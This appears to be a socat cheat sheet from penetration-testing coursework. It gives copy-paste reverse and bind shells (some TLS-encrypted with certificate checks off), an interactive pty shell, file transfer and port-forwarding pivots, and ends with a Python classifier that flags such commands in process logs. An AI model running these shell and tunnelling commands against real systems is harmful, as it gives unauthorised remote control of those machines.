I used socat heavily during PWK as it's a powerful tool. In addition to the functionality of netcat, with socat you can set up encrypted reverse/bind shells.
While all of this information is available in the help/man pages, you still have to piece together what you want from the information provided in the documentation.
I like to approach things from a conceptual standpoint. So rather than play with syntax or reread documentation until it’s memorized, I like to prepare the commands I use most with a tool ahead of time and copy/paste them in a terminal.
This is particularly useful when time is of the essence or just for building a PoC in general.
Options I use most:
-d (increase verbosity; repeat it, e.g. -d -d, for more)
fork (handle each accepted connection in a child process so the listener keeps serving)
verify=0 (do not verify the peer's TLS certificate)
pipes (with EXEC, talk to the child over pipes instead of a pty; needed for cmd.exe)
Address types I use most:
TCP4:<rhost>:<rport> (connect out)
TCP4-LISTEN:<port> (listen)
EXEC:/bin/bash
EXEC:cmd.exe,pipes
EXEC:bash,pipes
Connect to a remote service:
`socat - TCP4:<remote server ip address>:<portnumber>`
As a side note, socat requires `-` (STDIO) as an address to transfer data between your terminal and the remote host (i.e. keyboard interaction).
Listen on a port and print whatever arrives:
socat TCP4-LISTEN:<portnum> STDOUT
Root is required to bind a port below 1024.
Connect out and write what is received into a file:
`socat TCP4:<remote ip>:<remote port> file:received_secret_passwords.txt,create`
Reverse shells (run on the target, with a listener on <rhost>:<rport>):
socat TCP4:<rhost>:<rport> EXEC:/bin/bash
socat TCP4:<rhost>:<rport> EXEC:cmd.exe,pipes
socat TCP4:<rhost>:<rport> EXEC:bash,pipes
Encrypted bind shell. See SSL certificates for creating a .pem file. Target:
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
attacker:
socat - OPENSSL:<remote ip>:443,verify=0
Encrypted reverse shell. See SSL certificates for creating a .pem file. Target:
socat OPENSSL:<remote ip>:<remote port>,verify=0 EXEC:/bin/bash
attacker:
socat -d -d OPENSSL-LISTEN:<remote port>,cert=bind.pem,verify=0,fork STDOUT
Listening Side:
socat file:`tty`,raw,echo=0 tcp-listen:4444
Target Side:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
This is most useful for exposing a service that is only reachable on the target's localhost, for example.
your machine (the first address must be a listener so the target can connect in; once it has, point your browser at localhost:8000):
socat -v TCP4-LISTEN:10000 TCP4-LISTEN:8000
target machine:
socat TCP4:<my ip>:10000 TCP4:<internal webserver>:<internal webserver port>
On a target we listen on port 12080 and forward traffic to port 8080, which presumably is behind a firewall or otherwise unreachable. So now from our attack box we can send traffic to port 8080 via port 12080.
socat TCP-LISTEN:12080,reuseaddr,fork TCP:0.0.0.0:8080 &
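As an added example that is not part of the original cheat sheet: a small Python triage function for the defender side, which classifies socat command lines seen in process-creation logs into the patterns listed above (reverse/bind shell, port forward, double-listener relay, file transfer) and flags verify=0 and privileged listening ports. The SAMPLES lines are constructed for this example; file:`tty` style addresses are treated as plain files.

```python
import re
import shlex

LISTEN = ("TCP-LISTEN", "TCP4-LISTEN", "TCP6-LISTEN", "OPENSSL-LISTEN", "SSL-L")
CONNECT = ("TCP", "TCP4", "TCP6", "OPENSSL", "SSL")
SHELL = re.compile(r"(^|/)(bash|sh|zsh|cmd\.exe|powershell(\.exe)?)$", re.I)
SAMPLES = (  # constructed log lines, modelled on the commands in this cheat sheet
    "socat TCP4:10.0.0.5:4444 EXEC:/bin/bash",
    "sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash",
    "socat TCP-LISTEN:12080,reuseaddr,fork TCP:0.0.0.0:8080 &",
)

def split_address(addr):
    # "TCP4-LISTEN:443,fork" -> ("TCP4-LISTEN", "443", ["fork"]); "-" is STDIO
    if addr == "-":
        return "STDIO", "", []
    head, _, rest = addr.partition(":")
    parts = rest.split(",")
    return head.upper(), parts[0], parts[1:]

def classify(cmdline):
    argv = [a for a in shlex.split(cmdline) if a != "&"]
    while argv and "socat" not in argv[0]:   # skip wrappers such as sudo
        argv.pop(0)
    addrs = [a for a in argv[1:] if a == "-" or not a.startswith("-")]  # drop -d/-v
    if len(addrs) != 2:
        return None
    parsed = [split_address(a) for a in addrs]
    types = [t for t, _, _ in parsed]
    flags = set()
    for t, arg, opts in parsed:
        if t == "EXEC" and arg and SHELL.search(arg.split()[0]):
            flags.add("shell")
        if t.startswith(("OPENSSL", "SSL")) and "verify=0" in opts:
            flags.add("tls_noverify")  # peer certificate is never checked
        if t in LISTEN and arg.isdigit() and int(arg) < 1024:
            flags.add("privileged_port")  # bound as root
        if "pty" in opts:
            flags.add("pty")
    n_listen, n_connect = sum(t in LISTEN for t in types), sum(t in CONNECT for t in types)
    if "shell" in flags:
        label = "bind shell" if n_listen else "reverse shell"
    elif "FILE" in types and (n_listen or n_connect):
        label = "file transfer"
    elif n_listen == 2:
        label = "double-listener relay"
    elif n_listen and n_connect:
        label = "port forward"
    else:
        label = "other"
    return {"label": label, "flags": sorted(flags)}
```

Feed it the command-line field of your process-creation events; a "shell" flag with a "tls_noverify" or "privileged_port" flag is the combination worth alerting on first.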